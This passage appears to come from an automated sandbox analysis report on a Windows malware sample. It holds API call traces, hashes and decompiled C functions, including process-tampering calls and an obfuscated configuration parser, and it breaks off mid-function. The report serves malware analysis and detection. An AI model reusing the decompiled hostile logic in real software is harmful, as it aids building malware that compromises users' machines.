• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                              • Instruction ID: b6c405d1f79c3b54f124ad9c5ee8d670e1467b16caef2da0ff99a0d40edfd3b8
                              • Opcode Fuzzy Hash: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                              • Instruction Fuzzy Hash: 72310C71A0032DEFDF21DF98C888BEEB7FCAB15208F1440A9E559B7181D6709E858F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010432FF: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                                • Part of subcall function 010432FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                                • Part of subcall function 010432FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                                • Part of subcall function 010432FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0102CB7E
                                • Part of subcall function 0102C50B: memcpy.NTDLL(?,?,00000000,?,?,?,00000000), ref: 0102C52D
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseFreememcpy
                              • String ID:
                              • API String ID: 1301464996-0
                              • Opcode ID: 7e1419972fc4a3c2cc18db4b4fdab58e7cbddb5d29a877a94dae3e8c4941ca5a
                              • Instruction ID: 30deb8912fec09ddbe448a38ec189c3efa491e5a9ff74928f0de6960d5f3298d
                              • Opcode Fuzzy Hash: 7e1419972fc4a3c2cc18db4b4fdab58e7cbddb5d29a877a94dae3e8c4941ca5a
                              • Instruction Fuzzy Hash: 0411E3B6610312ABEB66DB58DED0EAEB7B8EB48310F100069F6829B251D7759D00EB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(01033C99,01050384,00000018,0102D760,04B38DBA,?,0102D760,04B38DBA,?,0102D760,04B38DBA,?,?,01033C99,?,0102D760), ref: 0103C9A0
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: f45e91cade216a269203423038fcb4043f18161ac17b25ba0e6fe377a8960555
                              • Instruction ID: 9dd244d0e5ab054d9cd4412cde0369243f86bfd6135d0809d95b694f8f4f3d6b
                              • Opcode Fuzzy Hash: f45e91cade216a269203423038fcb4043f18161ac17b25ba0e6fe377a8960555
                              • Instruction Fuzzy Hash: 8A119076200208ABD760DF59E845CAB3BACFBC0350B04C0A7B9C9DB15EEA366400DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010432FF: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                                • Part of subcall function 010432FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                                • Part of subcall function 010432FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                                • Part of subcall function 010432FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0102318C
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102882D
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,00000020,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102883C
                                • Part of subcall function 0102AF6F: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0102AF95
                                • Part of subcall function 0102AF6F: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0102AFA1
                                • Part of subcall function 0102AF6F: GetModuleHandleA.KERNEL32(?,04B396FC,00000000,?,00000000), ref: 0102AFC1
                                • Part of subcall function 0102AF6F: GetProcAddress.KERNEL32(00000000), ref: 0102AFC8
                                • Part of subcall function 0102AF6F: Thread32First.KERNEL32(?,0000001C), ref: 0102AFD8
                                • Part of subcall function 0102AF6F: CloseHandle.KERNEL32(?), ref: 0102B020
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                              • String ID:
                              • API String ID: 2627809124-0
                              • Opcode ID: 0922d701ef2f5ccd0ea6820d7192c7ec811ac34e1a996d3a05b7d3a961c6ec92
                              • Instruction ID: faa38fd42228b761f7686763daefac523cd392d394321e748231b00ca44af38c
                              • Opcode Fuzzy Hash: 0922d701ef2f5ccd0ea6820d7192c7ec811ac34e1a996d3a05b7d3a961c6ec92
                              • Instruction Fuzzy Hash: BE018FB5610225BFDB21DBA8DE84C9FBBFCEB083487100055F485A3104DA7AAE01C765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010432FF: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                                • Part of subcall function 010432FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                                • Part of subcall function 010432FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                                • Part of subcall function 010432FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 01032F00
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102882D
                                • Part of subcall function 0102881B: StrChrA.SHLWAPI(?,00000020,?,00000000,01023177,00000000,?,00000000,?,?,?,?,?,?), ref: 0102883C
                                • Part of subcall function 0102FD22: lstrlen.KERNEL32(?,?,00000000,00000000,0103D9EF,00000011,?,00000001,00000000,?,-00000008), ref: 0102FD52
                                • Part of subcall function 0102FD22: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 0102FD68
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,?,00000000), ref: 0102FD9E
                                • Part of subcall function 0102FD22: memcpy.NTDLL(00000010,00000000,?), ref: 0102FDB9
                                • Part of subcall function 0102FD22: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 0102FDD7
                                • Part of subcall function 0102FD22: GetLastError.KERNEL32 ref: 0102FDE1
                                • Part of subcall function 0102FD22: HeapFree.KERNEL32(00000000,00000000), ref: 0102FE04
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                              • String ID:
                              • API String ID: 730886825-0
                              • Opcode ID: 74318500c932422c2121d208cd182cd67229e7b2236f6119a10d97ae0abf50de
                              • Instruction ID: 1e4058fd26b914bce20dd80c45a573ea69fb7e3666b9c46d18972d69f5faa46d
                              • Opcode Fuzzy Hash: 74318500c932422c2121d208cd182cd67229e7b2236f6119a10d97ae0abf50de
                              • Instruction Fuzzy Hash: 2601DF35610316BBDB22DB98DE49FDF7BFCEB48710F000095FA81A3184DA75AA00DB66
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • memset.NTDLL ref: 01026C3F
                                • Part of subcall function 0102EA7F: memset.NTDLL ref: 0102EAA5
                                • Part of subcall function 0102EA7F: memcpy.NTDLL ref: 0102EACD
                                • Part of subcall function 0102EA7F: GetLastError.KERNEL32(00000010,00000218,01048D4D,00000100,?,00000318,00000008), ref: 0102EAE4
                                • Part of subcall function 0102EA7F: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,01048D4D,00000100), ref: 0102EBC7
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLastmemset$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 4290293647-0
                              • Opcode ID: d8533d3d08c0517174644d401a62b8cab4e08e5ea25ea6f1217ef60ddb04f65b
                              • Instruction ID: a747439dc4cb0f96153e116e58e94de4351d907e914ae1f0ac0f1a3c2f51a95e
                              • Opcode Fuzzy Hash: d8533d3d08c0517174644d401a62b8cab4e08e5ea25ea6f1217ef60ddb04f65b
                              • Instruction Fuzzy Hash: 8F01A27190132D6BD722AF29D880BAF7BECEB55214F108625FDC497241D772D91487A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E4FA0(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                              				void* _t17;
                              
                              				if(_a4 == 0) {
                              					L2:
                              					return E013E88FF(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                              				}
                              				_t17 = E013E262B(_a4, _a8, _a12, _a16, _a20); // executed
                              				if(_t17 != 0) {
                              					goto L2;
                              				}
                              				return _t17;
                              			}


                              APIs
                              • lstrlenW.KERNEL32(?,?,?,013E4AAE,3D013EC0,80000002,013E6096,013EA6E1,74666F53,4D4C4B48,013EA6E1,?,3D013EC0,80000002,013E6096,?), ref: 013E4FC5
                                • Part of subcall function 013E262B: SysAllocString.OLEAUT32(013EA6E1), ref: 013E2645
                                • Part of subcall function 013E262B: SysFreeString.OLEAUT32(00000000), ref: 013E2685
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$AllocFreelstrlen
                              • String ID:
                              • API String ID: 3808004451-0
                              • Opcode ID: 7b022f41b4435c2f3eb5caa5ce0ef71f9bed7a67e1e1a8354cb8913d5d2021b7
                              • Instruction ID: d21f1fde2d26f6346de6b6eff58023972a2a31d2788f7f90a5da9a9ac489bca2
                              • Opcode Fuzzy Hash: 7b022f41b4435c2f3eb5caa5ce0ef71f9bed7a67e1e1a8354cb8913d5d2021b7
                              • Instruction Fuzzy Hash: CDF0923200421EBFDF125F94EC09E9A3FAAEF18754F048114FA04540A0DB72C9B1EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E6A16(void* __edi, void* _a4) {
                              				int _t7;
                              				int _t12;
                              
                              				_t7 = E013E60DD(__edi, _a4,  &_a4); // executed
                              				_t12 = _t7;
                              				if(_t12 != 0) {
                              					memcpy(__edi, _a4, _t12);
                              					 *((char*)(__edi + _t12)) = 0;
                              					E013E6DFA(_a4);
                              				}
                              				return _t12;
                              			}


                              APIs
                                • Part of subcall function 013E60DD: memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 013E6113
                                • Part of subcall function 013E60DD: memset.NTDLL ref: 013E6188
                                • Part of subcall function 013E60DD: memset.NTDLL ref: 013E619C
                              • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,013E5BE3,?,?,013E512B,00000002,?,?,?), ref: 013E6A32
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memcpymemset$FreeHeap
                              • String ID:
                              • API String ID: 3053036209-0
                              • Opcode ID: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                              • Instruction ID: 70c5cd4e30be0689c5ca4e9b6f18b4ce62defac426fe08d83e881dadefe77170
                              • Opcode Fuzzy Hash: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                              • Instruction Fuzzy Hash: 21E086B6400339B7C7122A99DC05DEB7FACCF61594F044020FE0856141D632C95093E1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 01022E3B
                                • Part of subcall function 0103D058: RegOpenKeyExA.KERNELBASE(01022E53,00000000,00000000,00020119,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D09F
                                • Part of subcall function 0103D058: RegOpenKeyExA.ADVAPI32(01022E53,01022E53,00000000,00020019,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D0B5
                                • Part of subcall function 0103D058: RegCloseKey.ADVAPI32(80000001,80000001,?,?,80000001,?,?,00000000,?,?,?,01022E53,80000001), ref: 0103D0FE
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Open$Closememset
                              • String ID:
                              • API String ID: 1685373161-0
                              • Opcode ID: 898731edf258f07b5705594c62e6b3be3d8b821792af44caa82211b383a9c5a1
                              • Instruction ID: 62dd4c74ce8f629f4596a38f83748e5412f8b50725bf1f9141a83f0464530edc
                              • Opcode Fuzzy Hash: 898731edf258f07b5705594c62e6b3be3d8b821792af44caa82211b383a9c5a1
                              • Instruction Fuzzy Hash: 10E0C23024010CBBDB00AE84DC81FD8B75DDF60780F408014FE4C1E282DA31E664CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,0104C5B8,0000002C,0103656E,04B38DBA,?,00000000,0102EAB2,?,00000318), ref: 010435A3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: e86c1a3550fc8848efccfbc700fd6f2b3f7a49cc3fca69b6f6f0572162bd4f90
                              • Instruction ID: 0ac4d8a684dd6f4becd0ed98497a7e171e921c7b098d1813c356e8c0809e178c
                              • Opcode Fuzzy Hash: e86c1a3550fc8848efccfbc700fd6f2b3f7a49cc3fca69b6f6f0572162bd4f90
                              • Instruction Fuzzy Hash: B7D01734E01629DBDB219F98D98599FFBB0BF18720F608224F5A0771A0C7301951CFD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                                • Part of subcall function 01026285: ExpandEnvironmentStringsW.KERNEL32(010334DD,00000000,00000000,00000001,00000000,00000000,0102EFEF,010334DD,00000000,0102EFEF,00000020), ref: 0102629C
                                • Part of subcall function 01026285: ExpandEnvironmentStringsW.KERNEL32(010334DD,00000000,00000000,00000000), ref: 010262B6
                              • lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 0103F68B
                              • lstrlenW.KERNEL32(?,?,00000000), ref: 0103F697
                              • memset.NTDLL ref: 0103F6DF
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F6FA
                              • lstrlenW.KERNEL32(0000002C), ref: 0103F732
                              • lstrlenW.KERNEL32(?), ref: 0103F73A
                              • memset.NTDLL ref: 0103F75D
                              • wcscpy.NTDLL ref: 0103F76F
                              • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0103F795
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0103F7CA
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0103F7E6
                              • FindNextFileW.KERNEL32(?,00000000), ref: 0103F7FF
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0103F811
                              • FindClose.KERNEL32(?), ref: 0103F826
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F83A
                              • lstrlenW.KERNEL32(0000002C), ref: 0103F85C
                              • FindNextFileW.KERNEL32(?,00000000), ref: 0103F8D2
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0103F8E4
                              • FindClose.KERNEL32(?), ref: 0103F8FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                              • String ID:
                              • API String ID: 2962561936-0
                              • Opcode ID: 4916f74b12e85ef8cb74320debae14bdfc777896beb01d4fbc0a7dbe10177f08
                              • Instruction ID: 89e416eef16ca0ff26c41ed1cd56633cb2ba4552e6fb232ee48d65cfcc4224ba
                              • Opcode Fuzzy Hash: 4916f74b12e85ef8cb74320debae14bdfc777896beb01d4fbc0a7dbe10177f08
                              • Instruction Fuzzy Hash: 6281ACB1904306AFD761AF28DD84B1BBBEDFF88304F004869FAD596262D775D804CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0104612C
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0104615E
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 01046190
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 010461C2
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 010461F4
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 01046226
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 01046258
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0104628A
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 010462BC
                              • HeapFree.KERNEL32(00000000,?,?,?,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0104644B
                                • Part of subcall function 01039FCB: RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 01039FD4
                                • Part of subcall function 01039FCB: HeapFree.KERNEL32(00000000,?,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0103A006
                                • Part of subcall function 01039FCB: RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 0103A024
                              • HeapFree.KERNEL32(00000000,010394CE,?,010394CE,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0104648F
                              • StrToIntExA.SHLWAPI(00000000,00000000,00000000,?,010394CE,00000000,00000001,00000000,74784D40,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 010464E1
                                • Part of subcall function 0103A53E: lstrlen.KERNEL32(0104F072,04B3C0DC,0104F072,00000000,0103F629), ref: 0103A547
                                • Part of subcall function 0103A53E: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0103A56A
                                • Part of subcall function 0103A53E: memset.NTDLL ref: 0103A579
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FreeHeap$CriticalSection$EnterLeavelstrlenmemcpymemset
                              • String ID:
                              • API String ID: 2064646876-0
                              • Opcode ID: cc68ef5b7b7977775ade9e2cd52f944376db50d26b891673008f8d0a207c1129
                              • Instruction ID: 8819037e4a077731a9e3fbedab7b732ec7f85eb9a8bb9c32d792bc29f61b2fc3
                              • Opcode Fuzzy Hash: cc68ef5b7b7977775ade9e2cd52f944376db50d26b891673008f8d0a207c1129
                              • Instruction Fuzzy Hash: 62F1F6F0A00612ABDB61EB7CDDC499F77E9AB89740B244871B9C5D7208FA37DA01C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,69B25F44,00000000,?,?,01025D62,?,00000000,?), ref: 0102B92A
                              • GetLastError.KERNEL32(?,?,01025D62,?,00000000,?), ref: 0102B938
                              • NtSetInformationProcess.NTDLL ref: 0102B992
                              • GetProcAddress.KERNEL32(?,00000000), ref: 0102B9D1
                              • GetProcAddress.KERNEL32(?), ref: 0102B9F2
                              • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 0102BA49
                              • CloseHandle.KERNEL32(?), ref: 0102BA5F
                              • CloseHandle.KERNEL32(?), ref: 0102BA85
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                              • String ID:
                              • API String ID: 3529370251-0
                              • Opcode ID: 7e67882b7746db8f9257730df2af452fe9b62986f2cba7e852315cb8c4d98d55
                              • Instruction ID: d857f776845a0a273aeb44c7c3359aae7130989737c7f06a0947dc8e02b0a3c2
                              • Opcode Fuzzy Hash: 7e67882b7746db8f9257730df2af452fe9b62986f2cba7e852315cb8c4d98d55
                              • Instruction Fuzzy Hash: 18418EB1608315EFDB21DF25D984A5FBBE8FB88349F000A29F5D5D2160D776CA48CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • wcscpy.NTDLL ref: 0103E264
                              • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0103E270
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0103E281
                              • memset.NTDLL ref: 0103E29E
                              • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0103E2AC
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0103E2BA
                              • GetDriveTypeW.KERNEL32(?), ref: 0103E2C8
                              • lstrlenW.KERNEL32(?), ref: 0103E2D4
                              • wcscpy.NTDLL ref: 0103E2E6
                              • lstrlenW.KERNEL32(?), ref: 0103E300
                              • HeapFree.KERNEL32(00000000,?), ref: 0103E319
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                              • String ID:
                              • API String ID: 3888849384-0
                              • Opcode ID: 851d47454e3eb36ff6765709ccdbd4d19f937bf3e7837d5986c82d858a840c39
                              • Instruction ID: a8f3849dd10a3c5a4b1f7ec4b8ba4ce0c4786616463474a083af4a63f42a4a56
                              • Opcode Fuzzy Hash: 851d47454e3eb36ff6765709ccdbd4d19f937bf3e7837d5986c82d858a840c39
                              • Instruction Fuzzy Hash: 66314876900119FFCB21ABA5DD88CDEBBBDFF49360B108055F185E3024D73AAA01DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E013E294D(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                              				int _v8;
                              				void* _v12;
                              				void* _v16;
                              				signed int _t28;
                              				signed int _t33;
                              				signed int _t39;
                              				char* _t45;
                              				char* _t46;
                              				char* _t47;
                              				char* _t48;
                              				char* _t49;
                              				char* _t50;
                              				void* _t51;
                              				void* _t52;
                              				void* _t53;
                              				intOrPtr _t54;
                              				void* _t56;
                              				intOrPtr _t57;
                              				intOrPtr _t58;
                              				signed int _t61;
                              				intOrPtr _t64;
                              				signed int _t65;
                              				signed int _t70;
                              				void* _t72;
                              				void* _t73;
                              				signed int _t75;
                              				signed int _t78;
                              				signed int _t82;
                              				signed int _t86;
                              				signed int _t90;
                              				signed int _t94;
                              				signed int _t98;
                              				void* _t101;
                              				void* _t102;
                              				void* _t115;
                              				void* _t118;
                              				intOrPtr _t121;
                              
                              				_t118 = __esi;
                              				_t115 = __edi;
                              				_t104 = __ecx;
                              				_t101 = __ebx;
                              				_t28 =  *0x13ed2b4; // 0x69b25f44
                              				if(E013E5740( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                              					 *0x13ed308 = _v8;
                              				}
                              				_t33 =  *0x13ed2b4; // 0x69b25f44
                              				if(E013E5740( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                              					_v12 = 2;
                              					L69:
                              					return _v12;
                              				}
                              				_t39 =  *0x13ed2b4; // 0x69b25f44
                              				_push(_t115);
                              				if(E013E5740( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                              					L67:
                              					HeapFree( *0x13ed270, 0, _v16);
                              					goto L69;
                              				} else {
                              					_push(_t101);
                              					_t102 = _v12;
                              					if(_t102 == 0) {
                              						_t45 = 0;
                              					} else {
                              						_t98 =  *0x13ed2b4; // 0x69b25f44
                              						_t45 = E013E4F59(_t104, _t102, _t98 ^ 0x7895433b);
                              					}
                              					_push(_t118);
                              					if(_t45 != 0) {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                              							 *0x13ed278 = _v8;
                              						}
                              					}
                              					if(_t102 == 0) {
                              						_t46 = 0;
                              					} else {
                              						_t94 =  *0x13ed2b4; // 0x69b25f44
                              						_t46 = E013E4F59(_t104, _t102, _t94 ^ 0x219b08c7);
                              					}
                              					if(_t46 != 0) {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                              							 *0x13ed27c = _v8;
                              						}
                              					}
                              					if(_t102 == 0) {
                              						_t47 = 0;
                              					} else {
                              						_t90 =  *0x13ed2b4; // 0x69b25f44
                              						_t47 = E013E4F59(_t104, _t102, _t90 ^ 0x31fc0661);
                              					}
                              					if(_t47 != 0) {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                              							 *0x13ed280 = _v8;
                              						}
                              					}
                              					if(_t102 == 0) {
                              						_t48 = 0;
                              					} else {
                              						_t86 =  *0x13ed2b4; // 0x69b25f44
                              						_t48 = E013E4F59(_t104, _t102, _t86 ^ 0x0cd926ce);
                              					}
                              					if(_t48 != 0) {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                              							 *0x13ed004 = _v8;
                              						}
                              					}
                              					if(_t102 == 0) {
                              						_t49 = 0;
                              					} else {
                              						_t82 =  *0x13ed2b4; // 0x69b25f44
                              						_t49 = E013E4F59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                              					}
                              					if(_t49 != 0) {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                              							 *0x13ed02c = _v8;
                              						}
                              					}
                              					if(_t102 == 0) {
                              						_t50 = 0;
                              					} else {
                              						_t78 =  *0x13ed2b4; // 0x69b25f44
                              						_t50 = E013E4F59(_t104, _t102, _t78 ^ 0x2878b929);
                              					}
                              					if(_t50 == 0) {
                              						L41:
                              						 *0x13ed284 = 5;
                              						goto L42;
                              					} else {
                              						_t104 =  &_v8;
                              						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                              							goto L41;
                              						} else {
                              							L42:
                              							if(_t102 == 0) {
                              								_t51 = 0;
                              							} else {
                              								_t75 =  *0x13ed2b4; // 0x69b25f44
                              								_t51 = E013E4F59(_t104, _t102, _t75 ^ 0x261a367a);
                              							}
                              							if(_t51 != 0) {
                              								_push(_t51);
                              								_t72 = 0x10;
                              								_t73 = E013E2C74(_t72);
                              								if(_t73 != 0) {
                              									_push(_t73);
                              									E013E4D70();
                              								}
                              							}
                              							if(_t102 == 0) {
                              								_t52 = 0;
